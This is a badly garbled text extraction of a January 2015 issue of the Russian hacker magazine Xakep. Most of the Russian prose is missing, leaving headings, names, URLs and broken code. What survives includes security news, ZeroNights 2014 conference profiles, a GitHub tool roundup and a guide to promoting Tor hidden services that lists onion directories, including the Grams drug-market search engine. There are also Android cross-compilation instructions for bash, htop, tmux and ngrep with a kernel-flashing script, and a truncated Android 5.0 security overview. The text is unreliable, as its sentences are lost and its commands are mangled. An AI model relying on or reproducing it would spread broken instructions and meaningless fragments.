Вы находитесь на странице: 1из 145

192

Eiffel

. 36

. 90

450

Android 5.0



Varnish
. 114

Cover Story

ZERO
NIGHTS

2014
. 12

01 (192)

: 25.12.2014



rusanen@real.xakep.ru



chernova@real.xakep.ru



PC ZONE, UNITS
ilembitov@real.xakep.ru

ant

ant@real.xakep.ru


UNIXOID SYN/ACK
kruglov@real.xakep.ru

goltsev@real.xakep.ru


X-MOBILE
execbit.ru

rusanen@real.xakep.ru

Dr.

MALWARE, ,
PHREAKING
alexander@real.xakep.ru


-
, , , 16
. , , .
192 , ,
, .
, .
-. .
, . .
, - , - , - .
,
, .
, , , , ][-. , , ][
.
, ZN, , ,
. -, . , , ,
, .
!
ZN, , , .
ZN , ,
, PR, , , , . ZN
,
. ,
, , .
, ,
, , ZN, ][
!

DVD

ant

ant@real.xakep.ru

D1g1

Security-
evdokimovds@gmail.com


PR-
yakovleva.a@glc.ru



samsonenko@glc.ru


shop.glc.ru, info@glc.ru, (495) 663-82-77, (800) 200-3999 ( , , )

(lapina@glc.ru)
: , 109147, / 50

: claim@glc.ru. : 115280, , . , . 19, . : : 606400, ., -, . , .,


. 13. : , 614111, , . , . , . 26.
, (), 77-56756 29.01.2014 . Scanweb, PL 116, Korjalankatu 27, 45101
Kouvola, . 96 500 . 450 .
. . , , .
. : content@glc.ru. , , 2015

Stay tuned, stay ][!


,
][
@IlyaRusanen

16+

2015

192

004 MEGANEWS
012 ZERONIGHTS 2014:
020
022 Firefox Developer Edition
024 SEO
028 Linux- Android
036 security- Android 5.0
042 #3.
044 EASY HACK
048
054 IPMI/BMC-
058 ?
060
066 X-TOOLS C
068 2014 ,
076 2014 ][
082 R
086 MBAAS
090 , , Boeing
096 Sails.js MVC-
102 Rake
106 Parallels
108 , , !
114

- Varnish

120 , SIP-
125 , Linux11
130 ESPER
135 Apache Tomcat UNIX-
140 FAQ
144 WWW2 -

MEGANEWS
Silk Road
2.0 26-
(aka
Defcon). Silk Road
2.0
,


,
.

Silk Road 2.0
.

Mifrill
mifrill@real.xakep.ru


Silk Road
ONYMOUS,

, Silk Road,
Silk Road 2.0.
Silk Road
,
Onymous.
Onymous
. ,
Tor. , Silk Road 2.0
, Cloud 9,
Hydra, Pandora, Blue Sky, Topix, Flugsvamp, Cannabis
Road Black Market,
, , . ,

Tor-,
. , : Cash Machine,
Cash Flow, Golden Nugget, Fast Cash .

, Bitcoin 250 . , , , , .
, , : ? ,
Tor.
, , .
, ,
Onymous
. ,
. ,
. ,
, ,
Silk Road
2.0. ,
.

414 .onion
.
17 .

01 /192/ 2015


, APPLE
,

,
, iPhone, . , ,
.
Palo Alto Networks , 400 Mac, iPhone iPad , WireLurker.

iCloud . WireLurker Maiyadi ( ). , , Apple, .
, ,
.
, WireLurker .
,
Enterprise.
. , ,
: (,
).

OS X ( Yosemite).
Rootpipe
. , Apple
, .

,
15
.
.
Mail.Ru, eBaza ,

,
. 9,6
mail.ru, 2,5 yandex.ru 1,1 rambler.ru.

list.ru, bk.ru, narod.ru
yahoo.com. , , 100% -.
. , Mail.Ru ,
,
,

0,2% . ,
,
- 200
. , 98,8%
, .

.


.

. ,
,
. ,
!, ,
.

MEGANEWS

01 /192/ 2015

BADUSB

USB-

,
SR Labs ,
USB ? ,
,
.
(github.com/
adamcaudill/Psychson), .
(
: opensource.srlabs.de/projects/badusb), USB-
: Phison, Alcor, Renesas, ASmedia, Genesys
Logic, FTDI, Cypress Microchip. ,
PacSec. ,
, , .
, , . ,
, ,
.
, Phison . ASmedia,
, . Genesys USB 3.0, USB 2.0. ,
, , ,
.

, BadUSB
,
USB- ( )


.

,


.

86%

WordPress

WordPress 3.x, ,
.
,

JavaScript-, . WordPress 4.0
,
WordPress 4.0.1. 3.9.3, 3.8.5 3.7.5.

44%


, Google+
. ,
,
-, .
,

- Google,


Dropbox

451 Research.
, Dropbox
,
Dropbox
1000 , OneDrive. ,
18%
,
.

01 /192/ 2015


, BITCOIN-

,
. , ,
,
,
. Bitcoin
, . ,
,
BC .
, ,
,
( ).

.
CryptoLabs ,
,
. Case. (86 54 )
, .
Case SIM-, 60 .
, ,
, .
multi-signature, -

,
. .
. , ,
. Case
, . , ,
, : , ,
E Ink , .

. Mr.Bitcoin
, ,
.
,
, NFC-
(RFID- NTAG216,
NFC Type 2). :
.
- .

, Case

BC-.
Trezor. Trezor
, ,
,
. Case .


,

NFC-
(RFID-
NTAG216,
NFC Type 2)


?
Microsoft ,
Windows 10.
,
, , , ?

20

18

-3 :

48

43


Windows Store



Windows 8/8.1

17

15

, -

20



Cortana

13

MEGANEWS

01 /192/ 2015

,
,

GOOGLE NO-CAPTCHA


FIREFOX

GOOGLE
FIREFOX ,

Mozilla Firefox . , Firefox 1.0 10 2004 , .


Firefox 33.1 , . , Forget (),
, .
Google, 2004
. , Firefox . , Mozilla,
Google (
90% ). . ,
Yahoo, , Baidu.
Google, Bing, DuckDuckGo, eBay, Amazon, Twitter
Wikipedia. Google, DuckDuckGo, OZON.ru, Price.ru, Mail.Ru Wikipedia. .

, ,
: (
), ,
?. , .
Google No-CAPTCHA,
ReCAPTCHA. Snapchat, WordPress
HumbleBundle, .
, No-CAPTCHA , , .

, , IP- , , .
, ,
- . ,
,
. ,
. Google .

2014

Google ( )
2014 . 75 , 11 . ,
2013 .
, Facebook Messenger, WhatsApp,
Hike Twitter. .

, :
Lamoda

LinguaLeo
-
Anywayanyday

Delivery Club


Aviasales
Telegram

01 /192/ 2015

2016 Samsung Apple (


Samsung 80%
). Samsung
2014 - Apple,
.

NOKIA



.
Super Mario Brothers, Call
of Duty.
( )
5
140 .

Z LAUNCHER

Nokia
Microsoft, . Nokia
Nokia
N1 Android 5.0. , Nokia

2016 . .
iPad Mini, Nokia , , N1
, iPad, . : , IPS- 7,9 (2048 1536)
Gorilla Glass 3. N1 Intel Atom Z3580 2 (LPDDR3). - (eMMC 5.0) 32 . , 8 5 ,
5300 Wolfson WM8958E. , N1
micro-USB 2.0 Type-C .
250 .
. Nokia Z Launcher.
, :
, ( ).
Nokia .
,
. , . , , .
... . , , .
, Z Launcher , , , .
, . .

Z Launcher -,
Nexus 5, Galaxy
S5, S4, S3, Moto X,
Moto G, HTC One, Sony
Xperia Z1.

.

zlauncher.com.

Sandisk
SSD-DIMM, -,

. UltraDIMM
DDR3.

Google -
OS X
, Santa.
inhouse,

. Microsoft
:).

10

01 /192/ 2015



, Facebook
,
, ,

.

$400



TWITTER FACEBOOK

: .
,
.
Facebook Twitter, , : , .
Twitter .
, . ? :
Twitter . . .
Facebook . 1 , . Facebook
( , ) , . , ,
, , , ( ).
. ? , .

. ,

AAA-.
Minecraft ,
.

Bitcoin


BC

319
. ,
, Silk Road 2.0, ,
, , . . ,
, 400 . ,
,
BC :).

15 000

Facebook

Facebook

2014 .

(4960 ), (1893), (1773). , ,
29 .

, ,
, , . ,
15 , 3 ,

.

11

01 /192/ 2015

Google Play
Services ,
Google
Copresence,
iOS
Android. ,

Bluetooth Wi-Fi.

Raspberry Pi Model B+,


,
Model A. , : Raspberry Pi Model
A+ .
, : -, ,
,
. .
Model A+ :
86 65 . 23 . - Broadcomm BCM2385 ARM11
700 , 256 HDMI. , ,
. Model A+ USB (, Model B+ ), 40-
GPIO microSD. , 20 .
, , , (,
). ,
. ,
IMP Ubuntu . IMP
( 200 ), :
(11 11 ) Odroid U3 HardKernel, ARM Cortex-V9 1,7 , 2 16
. 20 Wireless HDMI, 20
. Ubuntu 14.04 LTS , IMP
,
.

,
IMP ,
34%

(33 799 100 000
).

,


,

.


Microsoft:
Microsoft Office iOS Android
.
Office 365 .

WhatsApp
end-to-end .

Cryptocat, Silent
Text Telegram, WhatsApp , .


: Microsoft
Xbox ,
, APU
20- .
APU 28-
.

Cover Story

12

01 /192/ 2015

ZERONIGHTS

2014:


rusanen@real.xakep.ru



. .
.
, - Security
Vacation Club. DSec, , .



ZeroNights,


. , ,
, ,

. Digital Security, ZN, .

ZN .
, , mobile web securiry, defensive-
(
, ,
ZN).
. ZN-
, ,
,
afterparties

:).


ZN2014 ,
. ,
ZN
, ,
, ,
. Go on!

01 /192/ 2015

ZeroNights 2014:

13

Cover Story

14

ZN
,

- /
Jean-Philippe (JP) Aumasson
:

Kudelski Security.
ZeroNights 2014:
Heartbleed, OpenSSL, LibreSSL Truecrypt,


, Crypto
Coding Standard.

- / Jake McGinty
: Open Whisper
Systems.
ZeroNights 2014: , - ,
,

, ,
.


: Kudelski
Security, .
ZeroNights 2014:
Workshop,
,
;
DES; AES.

? ,
. ,
ZeroNights ,
. : , , ,
. ,
. , . ,
, , - .
, .
. ,
, , , . , ,
, , . , , , . ,
, . , ,
. , , .
, ,
Hardware Village, ,
, , . , . , - , ,
Hardware Village . , , Hardware Village
, . ,
! , !

01 /192/ 2015

15

ZeroNights 2014:

Web-security
/ Nicolas Gregoire
:
.
ZeroNights 2014: , 25
.


: Wallarm,
][.
ZeroNights 2014:

-,

, .

, ][
. . : ZeroNights
. ,
, . : , .
, .
fast tracks ( 15-
) , , ,
, , .
ZN .
, , , , ][. ,
, ,
, 2014-
:).
, - . ZN
.
: .


:
bug bounty ,
][ , ,

Xakep.RU :).
ZeroNights 2014: ,

. , -
,
,
, ( ,
) .

16

Cover Story

01 /192/ 2015

, DSec,
X-Tools

Mobile security
/ Peter Hlavaty

/ Marco Grassi

: KEEN Team, ][.


ZeroNights 2014: root- Android
,
,

.

: R&D
viaForensics.
ZeroNights 2014:
.

Android iOS, ,


.

,

: , ][.
ZeroNights 2014:
,
4G-
. : SIM-, 4G
USB-, , IP- .


: viaForensics, ][.
ZeroNights 2014: Workshop
, forensics iOS.

,
.
ZeroNights
, .
ZeroNights, -

.
, ,


ZeroNights. , ,
,
. , ,
.
.
,
, ,
,

, ,
, ZeroNights.
,
:). , , ,

DEFCON Russia
.
P. S. : ZeroNights?
:
!

01 /192/ 2015

17

ZeroNights 2014:

//
/ Patroklos Argyroudis (argp)

, , ][
ZeroNights .
-
-, . , -
, , , :).
, , : , , CTF, , .
, - .
. ,

, . , - 0day-
Heartbleed ,
- .
, ,
proof of concept, .
,
- :
, .
, , , , ZN.
QIWI,
. , ,
QIWI- ,
:). ,
, ,

VISA ZN.
, , ZeroNights
. ,
. Digital
Security, , The Prodigy One Love Hackers (1995).
, ,
.

: Census S.A.
ZeroNights 2014: Heapbleed,
( ,
, / , )
, ,
.


:
.
ZeroNights 2014:
, , ,
.

/ Fabien Duchene
: ,
.
ZeroNights 2014: , ShiftMonkey KameleonFuzz, , .


: Digital Security.
ZeroNights 2014:
AV, hardware assisted (VT-x,
AMD-V) .


: , ][.
ZeroNights 2014: ,
,
.

:
ZeroNights?
:
!

Cover Story

18

01 /192/ 2015

, ESAGE Lab,

, ZeroNights 2013,
,
.
( ), , .
, .
:
.
.
. , CTF-,
open source
- .
QIWI, , , .
,

.
:).
. , @toxo4ka
bug bounty , .

( ) , @akochkov
- radare2 ( ),
. , private speaker party, ,
, ,
.
, @090h DJ-,
Hardware Village, , . ,
:).
, , ,
, , ,
.

Fast track

: Digital
Security, ][.
ZeroNights 2014:
Oracle, Oracle Database
Communication Protocol .



: Positive Technologies,
][.
ZeroNights 2014:

. , ,

,
. , ,
.


: -

(Esage Lab), ][,
.
ZeroNights 2014: Go ,

Go (-, ,
)
.

, Positive Technologies,

ZN . ,
ZN,
, .
.
. -
. - ,
: bit.ly/1tQGXoh. ,
, . , ,
, , , .
,
. Hardware Village, .
, .
, . CTF, ,
. afterparty .
, , . .

01 /192/ 2015

19

ZeroNights 2014:

, - ,
Wallarm
, , ZeroNights ,
. ZN , !
: , , (, , ) Black Hat, , :). ,
ZN,
.
, , Keynote. , ,
. Solar Designer , DOS, ( ) , , .
- , , , . . , -
Foursquare ZN, ?

:
, , ,
-
Black Hat, , :)
, PR- DSec
ZeroNights, , .
, ,
, , .
: ,
, , , .
ZN , , . . , : , ,
, CTF -.
, .
, , , , . ,
Defensive Track, - . , .
, 12 , , .
, CTF,
.
Shadow servants, 1336 h4x0rz, ,
.
for fun, , . (). , ,
. , , ZeroNights :).

, Wallarm
. ZN . , . MQ ,
DOS-. DEFCON,
( ,
). 20052006,
:).
! - . . - . .

Defensive Track

: QIWI.
ZeroNights 2014:
. NGFW
DPI .


: Mail.Ru Group.
ZeroNights 2014:
,
,
, .


: Nokia R&N, Here,
][.
ZeroNights 2014: , ModSecurity

Web ,
.



:
.
ZeroNights 2014:
open source .

20

PC ZONE

01 /192/ 2015


@ilya_pestov


rusanen@real.xakep.ru

,


, . GitHub
,
.
,
.


io.js

ClockPicker

https://github.com/iojs/io.js
JavaScript , : Node.js,
Joyent,
io.js.
, Node.js 2013 ( 0.10)
V8.
semver. Io.js

4000 GitHub.
13 2015
, , Node.js npm.

https://github.com/weareoutman/clockpicker
UI/UX-, datetime-picker.
hours-

, . .

Handsontable

<div class="input-group clockpicker">


<input type="text" class=
"form-control" value="09:30">
<span class="input-group-addon">
<span class="glyphicon
glyphicon-time"></span>
</span>
</div>
<script type="text/javascript">
$('.clockpicker').clockpicker();
</script>
ClockPicker jQuery.

https://github.com/handsontable/handsontable
,
Excel- .

, ,
Handsontable. API,
.
50
.
c Backbone, Angular, , ,
.

01 /192/ 2015

21

Clappr

Mermaid

https://github.com/globocom/clappr
Clappr . Clappr : ,
,
Google-. Clappr
.

https://github.com/knsv/mermaid
-. Mermaid
JavaScript-, -:

<body>
<div id="player"></div>
<script>
var playerEl = document.
getElementById("player");
var player = new Clappr.
Player({source: "http://your.video/

Front-end Job Interview


Questions
https://github.com/h5bp/Front-end-DeveloperInterview-Questions
.
HTML5 Boilerplate
- ,
HTML, CSS, JS .
,
, ,
.

here.mp4"});
player.attachTo(playerEl);
</script>
</body>

Nightrain
https://github.com/naetech/nightrain
PHP,
- . ,
OS , Windows Linux.
, nightrain ,
. Python
PHP/HTML/CSS/JS .
SQLite 3. , , , .
,
-.

<div class="mermaid">
CHART DEFINITION GOES HERE
</div>
graph LR;
A[Hard edge]-->|
Link text|B(Round edge);
B-->C{Decision};
C-->|One|D[Result one];
C-->|Two|E[Result two];
(. ).

Flexie
https://github.com/doctyper/flexie
W3C , .
.
. Flexie
,
CSS3 Flexible Box Model IE 6-9, Opera
10.0+, Firefox 3.0+, Safari 3.2+ Chrome 5.0+.

PhotoSwipe
https://github.com/dimsemenov/PhotoSwipe

. 3000
. PhotoSwipe HTML5 History API
, , , .

var pswpElement = document.


querySelectorAll('.pswp')[0];
// build items array
var items = [
{
src: 'https://placekitte.com/600/400',
w: 600,
h: 400
},
{
src: 'https://placekitten.
com/1200/900',
w: 1200,
h: 900
}

SVG Morpheus

];
// dene options (if needed)
var options = {
// optionName: 'option value'
for example:
index: 0
// start at rst slide
};
// Initializes and opens PhotoSwipe
var gallery = new PhotoSwipe
( pswpElement, PhotoSwipeUI_Default,
items, options);
gallery.init();

https://github.com/alexk111/SVG-Morpheus
C retina- SVG -
SVG . SVG
Morpheus ,
SVG-. .

22

PC ZONE

01 /192/ 2015


@ilya_pestov

FIREFOX DEVELOPER EDITION

Mozilla
. -, Firefox.
, Mozillian,
, Internet Explorer 95% . -, Chrome
SpiderMonkey V8 Google. -,
, , Firefox Developer Edition.
Firefox Developer Edition Firefox Aurora, Firefox
Nightly. :
Nightly Developer Edition Beta Release.
12 , . ,
Firefox.

JavaScript-
SpiderMonkey Mozilla
Google V8

Google



.

.

.

:
,
cookie, ,

, .

FIREFOX HELLO
, ,
WebRTC, ,
.
,
Telefonica
Firefox . Skype Firefox Hello.
,
browsing data

FFDE WebRTC

01 /192/ 2015

23


-,

. , ,
Firefox Chrome
- DevTools,
.
, ,

, , -
. , . Firefox
.

JavaScript.
-,
,
- DOM before after.

.
CSS-
.

.
Scratchpad JavaScript .
online- offline.
.

WEBIDE

VALENCE

WebIDE - ( ) Firefox 33, Developer


Edition. WebIDE, , ,
Firefox OS
Firefox OS. , , .

.

Firefox Tools
Adapter. Valence ,
(, Chrome
Android, Safari iOS) -, Firefox.


FFOS

WEB AUDIO EDITOR

, . , ,
Firefox Developer
Edition. , , ...
Mozilla - ? ,
. Its everything youre
used to, only better. .
.
.

Web Audio API .

Web Audio Editor

FFDE

PC ZONE

24

01 /192/ 2015

SEO
ff333xx


. ,

,
.

aquapix@shutterstock.com

WARNING

01 /192/ 2015

25

SEO

- 1999
Ozon Mail? Tor .
. . .
90-, , , ,
.
.

, -
( - ):
;
;
.
Tor . .

WWW


Tor Browser:
https://www.torproject.
org

PC ZONE

26

01 /192/ 2015

ONION-
tor-hidden- , :
1. Tor (https://www.torproject.org/download/download-easy.html.en).
2. -. . , ,
XAMPP Windows (sourceforge.net/projects/xampp/) MAMPP (www.mamp.
info/en/) OS X.
3. . :

Windows (https://www.torproject.org/docs/tor-doc-windows.html.en);
OS X (https://www.torproject.org/docs/tor-doc-osx.html.en);
Linux (https://www.torproject.org/docs/tor-doc-unix.html.en).

-,

( ).
:

. ,
,


AgoraMarket.

. ,


.


, , . Tor , . . -,
NoScript Tor
Browser.
JavaScript, .
-, , HTML5 <canvas>,
Canvas Fingerprint (
, ).
canvas- Tor
.
, , . , .
-, Tor cookies,
.
, Firefox.
HTML-
(. ][ ), .
- ,
https://hacks.mozilla.org.

WWW

Tor
Browser
:
https://www.torproject.
org/projects/torbrowser/
design/

01 /192/ 2015

27

SEO


, , SEO:
, . Tor- -


2000-,
.

,
WWW
.
The Hidden Wiki:
.
http://kpvzxxbbraaigawj.
:
onion
1. Tor . Onion wiki:

http://cu7yjdxqw37yjv5n.
, onion/Main_Page
,
Grams
, .
Google drugs 431 ,
Tor- .
, .
Tor- ,
. Tor-.
2. -
, , Tor-
,
. . ,
( ),
description.

. Torch
, 12
. .
SEO- .
. ,
,
. - ,
,
, ,
, -
.



.
.
Grams (http://grams7enufi7jmdl.onion/
addasite);
TorFind (http://ndj6p3asftxboa7j.onion/
submit.html);
Ahmia (https://ahmia.fi/add/).

INFO
.
Google- Tor - .


-
open source
AWStats (www.awstats.org)
Piwik (piwik.org).

INFO

.onion, .i2p.
.


. , , , .
Torch (http://xmh57jrzrnw6insl.onion/
adinfo.html);
TorAds Grams (http://toradsc6vvmtugty.onion/
auth/home).

.
, .
Stay tuned!

X-Mobile

01 /192/ 2015


rommanio@yandex.ru


LINUX- ANDROID
Android-, , Linux. , Terminal IDE, ,
. ?

PureSolution@shutterstock.com

28

01 /192/ 2015

29

, Android Linux.
, , . .
Native- Android ( ),
. . .
,
( NTFS, ), .
(
Android 4.3, Google. . .).
, , , , ,
.
, , Linux- .

linux-x86_64/bin:${HOME}/linaro-toolchain-4.6/bin
export NDKPATH=${HOME}/android-ndk-r10c export
ANDROID_SYSROOT=${HOME}/android-ndk-r10c/
platforms/android-18/arch-arm
export LINARO_SYSROOT=${HOME}/linaro-tool
chain-4.6/arm-unknown-linux-gnueabi/
sysroot export ARCH=arm export
CROSS_COMPILE_NDK=arm-linuxandroideabi-export CROSS_
COMPILE_LINARO=arm-unknownlinux- gnueabi-export CROSS_

COMPILE=$CROSS_COMPILE_NDK_export
make
CCOMPILE=$CROSS_COMPILE

()
, - , ,
(
Ubuntu):

$ sudo apt-get install git-core gnupg


ex bison gperf build-essential
zip curl libc6-devlib32ncurses
5-dev x11proto-core-dev libx11
dev:i386 libreadline6dev:i36
libgl1-mesa-glx:i386 libgl1-mesa
dev g++-multilib mingw32openjdk
6-jdk tofrodos python-markdown
libxml2-utilsxsltproc zlib1g
dev:i386 git libtool

modules, , , ( net/netfilter
):

, .
$ make modules_prepare
,
.
$ make M=net/netlter CFLAGS_MODULE=
/proc/modules.
-fno-pic
, .
NDK Linaro,
,
.
( ,
target-
, ),
NDK ,
, ,
Android , ,
/system/lib/modules POSIX- insmod .
, Linaro
,
POSIX- ARM, (
.
Android
, , goo.gl/gIzvZe), ,

.
. https://developer.
android.com/tools/sdk/ndk/index.html , NDK, .
:

$ chmod u+x android-ndk-r10c-linux-x86_64.bin


$ ./android-ndk-r10c-linux-x86_64.bin

Linaro. forum.xdadevelopers.com/showthread.php?t=2098133 .
Linaro GCC 4.6.4-2013.05 ( Cortex, arm-unknown-linux-gnueabilinaro_4.6.4-2013.05-build_2013_05_18.tar.bz2).
:

$ tar xjvf arm-unknown-linux-gnueabilinaro_4.6.4-2013.05-build_2013_05_18.tar.bz2


$ mv arm-unknown-linux-gnueabilinaro_4.6.4-2013.05 linaro-toolchain-4.6
~/.bashrc (
, ,
, , ):

export PATH=$PATH:${HOME}/android-ndk-r10c/
toolchains/arm-linux-androideabi-4.6/prebuilt/

30

X-Mobile

( ) opensource.samsung.com.
. /proc/config.gz, ,
, ,
.
, ,
arch/arm/configs/, . n1a_00_
defconfig, .
, , :

01 /192/ 2015

$ make n1a_00_defcong

make menuconfig, .


,
.
,
,

$ make -j9 CFLAGS_MODULE=-fno-pic


:

$ mkdir nal
$ cp arch/arm/boot/zImage nal
$ nd . -name '*ko' -exec cp '{}' nal \;
, ,
ZIP-. ,
( . . .). :

$
$
$
$

cd nal
git clone https://github.com/koush/AnyKernel.git
cp ./*.ko ./AnyKernel/system/lib/modules/
cp ./zImage ./AnyKernel/kernel/

,
, ( ,
),
, d-h.st/RgI, , , AnyKernel/
kernel/. , , AnyKernel/META-INF/com/google/android/
updater-script.
:

ui_print("Extracting System Files...");


set_progress(1.000000);
mount("ext4","MTD", "system", "/system");
package_extract_dir("system", "/system");
unmount("/system");

01 /192/ 2015

31

. ,
, , , .
:

ui_print("Extracting Kernel les...");


package_extract_dir("kernel", "/tmp");
ui_print("Installing kernel...");
set_perm(0, 0, 0777, "/tmp/dump_image");
set_perm(0, 0, 0777, "/tmp/mkbootimg.sh");
set_perm(0, 0, 0777, "/tmp/mkbootimg");
set_perm(0, 0, 0777, "/tmp/unpackbootimg");
run_program("/sbin/busybox", "dd", "if=/dev/block/
mmcblk0p9", "of=/tmp/boot.img");
run_program("/tmp/unpackbootimg", "-i", "/tmp/
boot.img", "-o", "/tmp/");
run_program("/tmp/mkbootimg.sh");
run_program("/sbin/busybox", "dd", "if=/tmp/
newboot.img", "of=/dev/block/mmcblk0p9");
ui_print("Done!");

$
$
$
$
$
$
$
$
$
$

export CROSS_COMPILE=$CROSS_COMPILE_LINARO
export CC=arm-unknown-linux-gnueabi-gcc
export CPP=arm-unknown-linux-gnueabi-cpp
export CXX=arm-unknown-linux-gnueabi-g++
export LD=arm-unknown-linux-gnueabi-ld
export AS=arm-unknown-linux-gnueabi-as
export AR=arm-unknown-linux-gnueabi-ar
export RANLIB=arm-unknown-linux-gnueabi-ranlib
export CPPFLAGS="--sysroot=$LINARO_SYSROOT"
export CFLAGS="--static --sysroot
=$LINARO_SYSROOT"
$ export CXXFLAGS="--sysroot=$LINARO_SYSROOT"
$ export LDFLAGS="--sysroot=$LINARO_SYSROOT"

/dev/block/mmcblk0p9 ,
. boot,
. , :

Bash

$ for i in /dev/block/platform/*/by-name/boot; \
do ls -l $i; done

Bash Linaro c FTP :

$ wget http://ftp.gnu.org/gnu/bash/bash-4.3.30.tar.gz
$ tar xzvf bash-4.2.53.tar.gz && cd bash-4.3.30

$ cd AnyKernel && zip -r AnyKernel.zip *



(TWRP CWM).

configure :


, -

Bash,
Android

$ ./congure --host=arm-linux --enable-static


-link --without-bash-malloc --disable-rpath
--disable-nls
$ make

32

X-Mobile

bash,
/system/xbin.
, bash Linaro. Bionic, libc Android,
POSIX- , bash (, , mkfifo() wctomb()). ,
bash
. Linaro , , POSIX- glibc.
bash , ,
Android, , glibc, , . , .

Lshw
Lshw ,
. ( Linaro) .
,
src/Makefile src/core/Makefile C++
Linaro ( CXX
arm-unknown-linux-gnueabi-g++),
--static CXXFLAGS. .

Htop

Linux.
ncurses,
. htop,
ncurses:

$ mkdir htop && cd $_


$ wget http://ftp.gnu.org/pub/gnu/ncurses/
ncurses-5.9.tar.gz

01 /192/ 2015

Htop,
Android

$ tar xzvf ncurses-5.9.tar.gz


$ cd ncurses-5.9
$SYSROOT_ADDITIONS, configure :

$ export SYSROOT_ADDITIONS=${HOME}/htop/rootdir
$ ./congure --with-normal --without-shared
--without-cxx-binding --enable-root-environ
--disable-widec --disable-GPM --without-ada
--without-tests --host=arm-linux --prex=
$SYSROOT_ADDITIONS
$ make && make install

, (
Ada).
htop,
:

$ cd ..
$ wget http://hisham.hm/htop/releases/1.0.3/
htop-1.0.3.tar.gz
$ tar xzvf htop-1.0.3.tar.gz
$ cd htop-1.0.3
:

$ export CPPFLAGS="--sysroot=$LINARO_SYSROOT"
$ export CFLAGS="--static -I${SYSROOT_ADDITIONS}/
include --sysroot=$LINARO_SYSROOT"
$ export CXXFLAGS="--sysroot=$LINARO_SYSROOT"
$ export LDFLAGS="-L${SYSROOT_ADDITIONS}/
ncurses-5.9/lib --sysroot=$LINARO_SYSROOT"
$ export LIBS="${SYSROOT_ADDITIONS}/lib/
libncurses.a"

01 /192/ 2015

$ ./congure --host=arm --enable-static


--disable-unicode
$ make
,
Error opening terminal: screen. - terminfo
( Terminal IDE, , ), /system/etc :

# export TERMINFO=/system/etc/terminfo
htop .

Tmux
Tmux
screen,
OpenBSD. Android
adb shell SSH (,
TV Box HDMI- Android. .
.).
tmux
ncurses , rootdir. ncurses, libevent. tmux, $SYSROOT_ADDITIONS libevent tmux:

$ export SYSROOT_ADDITIONS=${HOME}/tmux/rootdir
$ git clone https://github.com/libevent/
libevent.git
$ git clone git://git.code.sf.net/p/tmux/tmux-code
libevent:

33

,
google,
ngrep
SSH-
Android.
tmux.

lshw

libpcap D-Bus
Android

34

X-Mobile

01 /192/ 2015

$ cd ../libevent
$ ./autogen.sh
$ ./congure --host=arm-linux --disableshared --disable-openssl --disable-samples
-prex=$SYSROOT_ADDITIONS
$ make && make install

--sysroot=$LINARO_SYSROOT"
$ ./congure --enable-static --disable-dropprivs
--host=arm-linux --with-pcap-includes=
${SYSROOT_ADDITIONS}/include/pcap
$ make
configure. libpcap
D-Bus Android (
Linux, ). ngrep
libpcap /etc/passwd Android,
.

tmux:

$ export CFLAGS="--static-I
${SYSROOT_ADDITIONS}/include -I/${SYSROOT_
ADDITIONS}/include/ncurses --sysroot=
$LINARO_SYSROOT"
$ export LDFLAGS=" -L${SYSROOT_ADDITIONS}/
lib -L${SYSROOT_ADDITIONS}/include -L
${SYSROOT_ADDITIONS}/include/ncurses
LINUX DEPLOY
--sysroot=$LINARO_SYSROOT"

,
$ export LIBEVENT_CFLAGS="I${SYSROOT_ADDITIONS}
(, /include --sysroot=$LINARO_SYS torrent- rtorrent
ROOT"
libtorrent, ,
$ export LIBEVENT_LIBS="
,
L${SYSROOT_ADDITIONS}
Boost). -
/lib -levent
Android
--sysroot=$LINARO_SYSROOT"
,

ANDROID

POSIX- , ,
Linux. , :
SDL ; ;
FFmpeg - ;
Qt , Qt Android;
Unity ;
Ogre OpenGL
3D-.

.

$ ./congure --enable static --host=arm-linux &&
.
make
Linux Deploy,
Google Play.
tmux,
Android
TERMINFO,
Linux, TMPDIR
,
/data/local/tmp.
,
.
POSIX- (
# export TERMINFO=/system/
), etc/terminfo

# export TMPDIR=/data/
chroot- ( local/tmp
)
userland- , tmux
, ARM.
, Linux Deploy , .
loop-.
:
Ngrep
Ubuntu;
,
OpenSUSE;
( , ,
Fedora;
RESTful-). Arch Linux;
libpcap. , ,
Gentoo;
libpcap, :
, , Kali Linux ( , ,
).
,
tmux:

$ mkdir ngrep && cd $_


$ wget http://www.tcpdump.org/release/
libpcap-1.6.2.tar.gz
$ tar xzvf libpcap-1.6.2.tar.gz
$ cd libpcap-1.6.2
$ export SYSROOT_ADDITIONS=${HOME}/ngrep/
rootdir
$ ./congure --host=arm-linux --disable-shared
--with-pcap=linux --disable-dbus --prex=
$SYSROOT_ADDITIONS
$ make && make install
ngrep, , :

$ export CFLAGS="--static -I${SYSROOT_ADDITIONS}


/include -I${SYSROOT_ADDITIONS}/include/pcap
--sysroot=$LINARO_SYSROOT"
$ export LDFLAGS=" -L${SYSROOT_ADDITIONS}/lib
-L${SYSROOT_ADDITIONS}/include -L
${SYSROOT_ADDITIONS}/include/pcap

: SSH VNC. SSH- Android Linux


Deploy ,
. VNC,
Android VNC- ( bVNC).

,
Linux, . , ,
. ,
, .

(
, )
Android. .

01 /192/ 2015

35

,
, , iptables.
,
.
POSIX-
NDK,
Bionic POSIX, ARM, , , glibc, . ,
, -


Ubuntu Linux Deploy

Ubuntu Linux Deploy



, ,
.

Linux Deploy, Android userland- .
. -,
, -, userland 4 , ,
, .
POSIX- Android .
- , .
Stay freedom.

X-Mobile

Art Hakker Photography@flicker.com

36
01 /192/ 2015

01 /192/ 2015

37

SECURITY-
ANDROID 5.0


androidstreet.net

Lollipop
Android Ice Cream Sandwitch.
Google
,
,

.


,

.

38

X-Mobile


Google Android .
Android ,
, ,
RPC- INFO
(Binder), ,

(dalvik) , ,
(James Comey)
(

).

iOS 8
. Google
Android 5.0, ,
OpenBSD
Bionic (
dmalloc calloc, Android 1.5),
No eXecute (NX) 2.3,


.
-fstack-protector Wformat-security
-Werror=format-security ( ).
3.0 ,
Linux- dm-crypt. Android 4.0
API
KeyChain,
.
4.1 ( )
HAL- keymaster
( , M-Shield OMAP4, Galaxy Nexus).
2012 Google
- Bouncer,

Google Play
, .
-

.

4.2,
2013-
Google Services
2.3 .
2014-
,
. SMS-
Android 4.2

.
Android 4.2

SELinux,
(permissive mode), 4.4
enforcing,


,
. 4.3
SETUID- -

01 /192/ 2015

/system
(capabilities) Linux .
Android Google

,
Apple
. ,
,
,
.
, Google , . Android
5.0 security specific ,
, , .
: ,
5.0, SELinux, root.


Apple, Android ,
iOS.
Lollipop, /data,
()
.
,
3.0
, :
(Master Key)

, PIN-
;
(Key Encryption Key, KEK)
,
Trusted Execution Environment (TEE),
